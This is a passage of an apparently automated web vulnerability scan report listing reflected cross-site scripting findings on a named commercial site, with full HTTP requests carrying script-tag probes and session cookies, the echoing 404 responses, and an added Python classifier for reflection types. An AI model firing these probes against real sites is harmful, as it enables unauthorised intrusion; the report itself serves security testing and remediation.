The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9cd8e<script>alert(1)</script>049aedf0237 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/rating.php?9cd8e<script>alert(1)</script>049aedf0237=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/rating.php?9cd8e<script>alert(1)</script>049aedf0237=1 was not found on this server.</p>
...[SNIP]...

2.2825. http://www.resellerbase.com/detail/40/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9abe1<script>alert(1)</script>ed0ddc42e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9abe1<script>alert(1)</script>ed0ddc42e53/40/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9abe1<script>alert(1)</script>ed0ddc42e53/40/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2826. http://www.resellerbase.com/detail/40/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84430<script>alert(1)</script>74544717e9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4084430<script>alert(1)</script>74544717e9e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4084430<script>alert(1)</script>74544717e9e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2827. http://www.resellerbase.com/detail/40/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload af1f3<script>alert(1)</script>8e76736833e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/search.phpaf1f3<script>alert(1)</script>8e76736833e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/search.phpaf1f3<script>alert(1)</script>8e76736833e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2828. http://www.resellerbase.com/detail/40/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c002c<a>798f8e8cc43 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the lower confidence here reflects the probe that was sent (a bare <a> tag), not an observed filter: the response is the same 404 page that echoes a full <script> probe unmodified in the neighbouring findings for this path, so resubmitting this parameter with the script payload is the obvious manual check.

Request

GET /detail/40/search.php?keyword=search...&Submit3=Searchc002c<a>798f8e8cc43&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/search.php?keyword=search...&Submit3=Searchc002c<a>798f8e8cc43&opt=2 was not found on this server.</p>
...[SNIP]...
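The classifier below is an added example, not part of the report and not Burp Suite's own logic, which is not published here. It models the verification step behind the Confidence values in this section: the "Certain" findings (for instance 2.2818 above) sent a <script> probe wrapped in random-looking markers and saw it come back byte-for-byte as text between tags, while the "Firm" findings such as 2.2828 sent only a bare <a> tag. The sample pages, the verdict labels and the truncated and attribute-context cases are constructed assumptions; the marker strings and URLs are copied from the two findings named.

```python
import re
from html import escape

SCRIPT_PROBE = "<script>alert(1)</script>"   # probe behind "Confidence: Certain"
TAG_PROBE = "<a>"                             # probe behind "Confidence: Firm"


def not_found_page(shown_url: str) -> str:
    """Constructed 404 page with the same sink as the one quoted in the report."""
    return ("<html><head><title>Error 404 - Page Not Found</title></head><body>"
            "<p>The requested URL " + shown_url + " was not found on this server.</p>"
            "</body></html>")


def classify_reflection(body: str, prefix: str, probe: str, suffix: str) -> str:
    """Find prefix...suffix in the response and judge what came back between them.

    certain - probe echoed byte-for-byte as text between tags (the script runs)
    firm    - a bare tag was echoed raw, but no script proof-of-concept was sent
    encoded - probe came back HTML-entity encoded (not exploitable in this sink)
    in_tag  - echoed raw, but inside a tag or attribute (a different context)
    altered - markers present but the probe was changed or truncated
    absent  - the markers never appeared in the response
    """
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    if m is None:
        return "absent"
    echoed = m.group(1)
    if echoed == probe:
        before = body[:m.start()]
        # An unmatched '<' before the reflection means we are still inside a tag.
        if before.rfind("<") > before.rfind(">"):
            return "in_tag"
        return "certain" if "<script" in probe.lower() else "firm"
    if echoed in (escape(probe), escape(probe, quote=False)):
        return "encoded"
    return "altered"


def build_samples():
    """Constructed request/response pairs shaped like findings 2.2818 and 2.2828."""
    p1 = ("da45b", SCRIPT_PROBE, "bc6fb96243eb7c4e6")   # REST URL parameter 1
    p2 = ("c002c", TAG_PROBE, "798f8e8cc43")            # Submit3 parameter
    url1 = "/detail" + "".join(p1) + "/40/rating.php?id=40&rating=5"
    url2 = "/detail/40/search.php?keyword=search...&Submit3=Search" + "".join(p2) + "&opt=2"
    truncated = url1.replace("</script>", "")          # a filter stripping the close tag
    return {
        "rest_param_1_raw":       (p1, not_found_page(url1)),
        "submit3_tag_raw":        (p2, not_found_page(url2)),
        "rest_param_1_encoded":   (p1, not_found_page(escape(url1))),
        "rest_param_1_in_href":   (p1, '<a href="' + url1 + '">back</a>'),
        "rest_param_1_truncated": (p1, not_found_page(truncated)),
        "rest_param_1_absent":    (p1, not_found_page("/detail/40/rating.php")),
    }


def scan(samples):
    """Classify every sample; returns {name: verdict}."""
    return {name: classify_reflection(body, *payload)
            for name, (payload, body) in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan(build_samples()).items():
        print(f"{name:26} {verdict}")
```

The marker-based search is what lets a scanner tell a reflection of its own input apart from an unrelated occurrence of "<script>" on the page, and the "in_tag" branch is why a raw echo is not automatically rated as text between tags: the same bytes inside an href need a different payload.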

2.2829. http://www.resellerbase.com/detail/40/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c5a2d<a>696cc3e89c3 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/search.php?keyword=search...c5a2d<a>696cc3e89c3&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/search.php?keyword=search...c5a2d<a>696cc3e89c3&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2830. http://www.resellerbase.com/detail/40/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dbee3<script>alert(1)</script>666b381f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/search.php?keyword=search...&Submit3=Search&opt=2&dbee3<script>alert(1)</script>666b381f61=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/search.php?keyword=search...&Submit3=Search&opt=2&dbee3<script>alert(1)</script>666b381f61=1 was not found on this server.</p>
...[SNIP]...

2.2831. http://www.resellerbase.com/detail/40/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload bd022<a>d53d6a33d5c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/search.php?keyword=search...&Submit3=Search&opt=2bd022<a>d53d6a33d5c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/search.php?keyword=search...&Submit3=Search&opt=2bd022<a>d53d6a33d5c was not found on this server.</p>
...[SNIP]...

2.2832. http://www.resellerbase.com/detail/40/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2160a<script>alert(1)</script>45618fd8851 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2160a<script>alert(1)</script>45618fd8851/40/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2160a<script>alert(1)</script>45618fd8851/40/themes/ was not found on this server.</p>
...[SNIP]...

2.2833. http://www.resellerbase.com/detail/40/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d292a<script>alert(1)</script>88dcb332bef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40d292a<script>alert(1)</script>88dcb332bef/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40d292a<script>alert(1)</script>88dcb332bef/themes/ was not found on this server.</p>
...[SNIP]...

2.2834. http://www.resellerbase.com/detail/40/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bef25<script>alert(1)</script>829ea1ff336 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themesbef25<script>alert(1)</script>829ea1ff336/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themesbef25<script>alert(1)</script>829ea1ff336/ was not found on this server.</p>
...[SNIP]...

2.2835. http://www.resellerbase.com/detail/40/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e38b3<script>alert(1)</script>0abc754deb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/?e38b3<script>alert(1)</script>0abc754deb1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/?e38b3<script>alert(1)</script>0abc754deb1=1 was not found on this server.</p>
...[SNIP]...

2.2836. http://www.resellerbase.com/detail/40/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b9c4e<script>alert(1)</script>d53425ae096 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb9c4e<script>alert(1)</script>d53425ae096/40/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb9c4e<script>alert(1)</script>d53425ae096/40/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2837. http://www.resellerbase.com/detail/40/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dbff5<script>alert(1)</script>2a6b20b2dd1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40dbff5<script>alert(1)</script>2a6b20b2dd1/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40dbff5<script>alert(1)</script>2a6b20b2dd1/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2838. http://www.resellerbase.com/detail/40/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f61e6<script>alert(1)</script>9367a0ab4e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themesf61e6<script>alert(1)</script>9367a0ab4e0/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themesf61e6<script>alert(1)</script>9367a0ab4e0/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2839. http://www.resellerbase.com/detail/40/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e36fd<script>alert(1)</script>c0e4877c66d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmose36fd<script>alert(1)</script>c0e4877c66d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmose36fd<script>alert(1)</script>c0e4877c66d/ was not found on this server.</p>
...[SNIP]...

2.2840. http://www.resellerbase.com/detail/40/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 20494<script>alert(1)</script>90d99829b0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/?20494<script>alert(1)</script>90d99829b0b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/?20494<script>alert(1)</script>90d99829b0b=1 was not found on this server.</p>
...[SNIP]...

2.2841. http://www.resellerbase.com/detail/40/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ca54<script>alert(1)</script>5b4fe049bf2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9ca54<script>alert(1)</script>5b4fe049bf2/40/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
